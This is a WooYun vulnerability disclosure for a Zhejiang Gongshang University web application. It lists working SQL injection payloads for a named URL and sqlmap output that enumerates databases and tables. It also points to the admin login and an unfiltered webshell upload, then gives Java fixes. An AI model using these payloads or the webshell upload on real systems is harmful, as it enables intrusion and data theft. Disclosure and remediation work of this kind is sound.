WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-01-19: Details sent to the vendor; awaiting vendor handling.
2015-01-24: The vendor chose to ignore the vulnerability; details are now public.
SQL injection on a Zhejiang Gongshang University site #01
1. Injection point: http://kyc.zjgsu.edu.cn/kyc_new/notify.do?ActionMethod=view&id=1543
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ActionMethod=view&id=1543' AND 6962=6962 AND 'tdtU'='tdtU

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: ActionMethod=view&id=-2556' UNION ALL SELECT 28,CHAR(58) CHAR(118) CHAR(118) CHAR(110)CHAR(58) CHAR(112) CHAR(104) CHAR(110) CHAR(102) CHAR(122) CHAR(76) CHAR(90) CHAR(69) CHAR(101) CHAR(104) CHAR(58) CHAR(97) CHAR(109) CHAR(110) CHAR(58),28,28--

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ActionMethod=view&id=1543'; WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ActionMethod=view&id=1543' WAITFOR DELAY '0:0:5'--
---
[10:30:07] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[10:30:07] [INFO] fetching database names
[10:30:07] [INFO] the SQL query used returns 7 entries
[10:30:07] [INFO] resumed: "kyc"
[10:30:07] [INFO] resumed: "master"
[10:30:07] [INFO] resumed: "model"
[10:30:07] [INFO] resumed: "msdb"
[10:30:07] [INFO] resumed: "Northwind"
[10:30:07] [INFO] resumed: "pubs"
[10:30:07] [INFO] resumed: "tempdb"
available databases [7]:
[*] kyc
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
2. Databases enumerated; next, check the privileges of the database user.
3. All tables in the current database:
Database: kyc
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| dbo.[Work]           | 9471    |
| dbo.oldwork          | 6563    |
| dbo.ProjectPoints    | 3385    |
| dbo.Journal          | 1831    |
| dbo.Journal_temp     | 1824    |
| dbo.GroupUser        | 1629    |
| dbo.newTable1        | 1545    |
| dbo.RegUser          | 1545    |
| dbo.OutlayDetail     | 1345    |
| dbo.pointshz         | 1295    |
| dbo.notify           | 1209    |
| dbo.Outlay           | 1091    |
| dbo.Award            | 592     |
| dbo.[??]             | 290     |
| dbo.news             | 257     |
| dbo.Communication    | 252     |
| dbo.TypePoints       | 113     |
| dbo.priv             | 82      |
| dbo.func             | 51      |
| dbo.College          | 46      |
| dbo.Department       | 46      |
| dbo.document         | 43      |
| dbo.sort             | 39      |
| dbo.fff              | 38      |
| dbo.RankTypeObj      | 33      |
| dbo.Tables           | 29      |
| dbo.AwardTypeObj     | 25      |
| dbo.OrderTypeObj     | 22      |
| dbo.pbcatedt         | 21      |
| dbo.kill_kk          | 20      |
| dbo.pbcatfmt         | 20      |
| dbo.PrjSource        | 20      |
| dbo.sere             | 20      |
| dbo.PrjRank          | 19      |
| dbo.WorkMember       | 15      |
| dbo.zlmb_tr          | 15      |
| dbo.orgs             | 14      |
| dbo.SignTypeObj      | 12      |
| dbo.manager          | 10      |
| dbo.download         | 9       |
| dbo.kyjhhyh          | 9       |
| dbo.WcTypeObj        | 9       |
| dbo.AwardSignTypeObj | 6       |
| dbo.IndexTypeObj     | 6       |
| dbo.PrjAwdRatio      | 6       |
| dbo.ProductionType   | 6       |
| dbo.stuff            | 6       |
| dbo.sysconstraints   | 6       |
| dbo.BookWcTypeObj    | 5       |
| dbo.glgz             | 5       |
| dbo.status           | 5       |
| dbo.UserGroup        | 5       |
| dbo.[level]          | 3       |
| dbo.dlmb_tr          | 3       |
| dbo.syssegments      | 3       |
| dbo.harvest          | 2       |
| dbo.prjlevel         | 2       |
| dbo.project          | 2       |
| dbo.D99_REG          | 1       |
| dbo.depart_z         | 1       |
| dbo.guizu            | 1       |
| dbo.kycxcl           | 1       |
+----------------------+---------+
4. Locate the admin backend, obtain the administrator password and log in: http://kyc.zjgsu.edu.cn/kyc_new/login.do
1. The site appears to have been compromised before.
2. Upload point: a JSP Chopper (菜刀) webshell can be uploaded directly; no filtering is done at all.
Fix: guard against SQL injection, and validate uploads on the server side.
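As an added example (not code from the report or from the affected site), here are the two fixes recommended above, written for a JSP application backed by Microsoft SQL Server like the one described: the string-concatenated lookup behind a `notify.do?id=...` style endpoint beside its `PreparedStatement` replacement, and a server-side upload check. The class, table and column names (`NotifyFix`, `notify`, `title`), the upload directory and the allowed file types are assumptions; Java 11 or later is assumed.

```java
// Added example, not the site's or the report's own code. Illustrates the two
// fixes recommended in the report for a JSP / Microsoft SQL Server application.
// Class, table, column and directory names are assumptions; requires Java 11+.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Set;
import java.util.UUID;

public class NotifyFix {

    // BEFORE: the pattern behind notify.do?ActionMethod=view&id=... in the report.
    // The id value is spliced into the SQL text, so a value such as
    // 1543' AND 6962=6962 AND 'tdtU'='tdtU becomes part of the query logic.
    static String vulnerableQuery(String id) {
        return "SELECT title FROM notify WHERE id = '" + id + "'";
    }

    // AFTER: the SQL text is constant and the id is bound as a typed parameter,
    // so quotes, UNION or WAITFOR in the input can only ever be data.
    static String findNotifyTitle(Connection conn, String rawId) throws SQLException {
        int id;
        try {
            id = Integer.parseInt(rawId.trim()); // ids are integers; anything else is rejected
        } catch (NumberFormatException e) {
            return null;
        }
        try (PreparedStatement ps = conn.prepareStatement(
                "SELECT title FROM notify WHERE id = ?")) {
            ps.setInt(1, id);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString("title") : null;
            }
        }
    }

    // Upload handling: an extension allowlist, a check that the content matches
    // the claimed type, and a server-chosen name in a directory outside the
    // web root, so even a file that passes the checks is never served as JSP.
    private static final Set<String> ALLOWED_EXT = Set.of("pdf", "png", "jpg");
    private static final Path UPLOAD_DIR = Path.of("/var/kyc/uploads"); // assumed; not under the webapp

    static String allowedExtension(String originalName) {
        String name = originalName.toLowerCase();
        // Reject path separators and NUL bytes anywhere in the name, then judge
        // the file by the text after the LAST dot only; the content check and
        // the out-of-webroot storage cover what a name check cannot.
        if (name.indexOf('/') >= 0 || name.indexOf('\\') >= 0 || name.indexOf('\0') >= 0) return null;
        int dot = name.lastIndexOf('.');
        if (dot < 0) return null;
        String ext = name.substring(dot + 1);
        return ALLOWED_EXT.contains(ext) ? ext : null;
    }

    // Leading bytes (magic numbers) of the allowed types.
    static boolean hasExpectedMagic(byte[] head, String ext) {
        switch (ext) {
            case "pdf": return head.length >= 4 && head[0] == '%' && head[1] == 'P'
                               && head[2] == 'D' && head[3] == 'F';
            case "png": return head.length >= 4 && (head[0] & 0xFF) == 0x89 && head[1] == 'P'
                               && head[2] == 'N' && head[3] == 'G';
            case "jpg": return head.length >= 3 && (head[0] & 0xFF) == 0xFF
                               && (head[1] & 0xFF) == 0xD8 && (head[2] & 0xFF) == 0xFF;
            default:    return false;
        }
    }

    static Path storeUpload(String originalName, InputStream body) throws IOException {
        String ext = allowedExtension(originalName);
        if (ext == null) throw new IOException("file type not allowed");
        byte[] head = body.readNBytes(8);
        if (!hasExpectedMagic(head, ext)) throw new IOException("content does not match extension");
        Files.createDirectories(UPLOAD_DIR);
        // The client-supplied name is never used on disk.
        Path dest = UPLOAD_DIR.resolve(UUID.randomUUID() + "." + ext);
        try (OutputStream out = Files.newOutputStream(dest)) {
            out.write(head);
            body.transferTo(out);
        }
        return dest;
    }
}
```

The parameterized query is the fix that removes every injection type sqlmap listed above (boolean, UNION, stacked and time-based) at once, because the DBMS never parses the input as SQL. For uploads, the allowlist and magic check stop the obvious cases, but the decisive control is storing files under a server-chosen name outside the servlet container's document root and serving them through a handler, so a stored file cannot be reached as a `.jsp` URL.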
Severity: no impact (vendor ignored)
Ignored at: 2015-01-24 14:18
Vendor response: none yet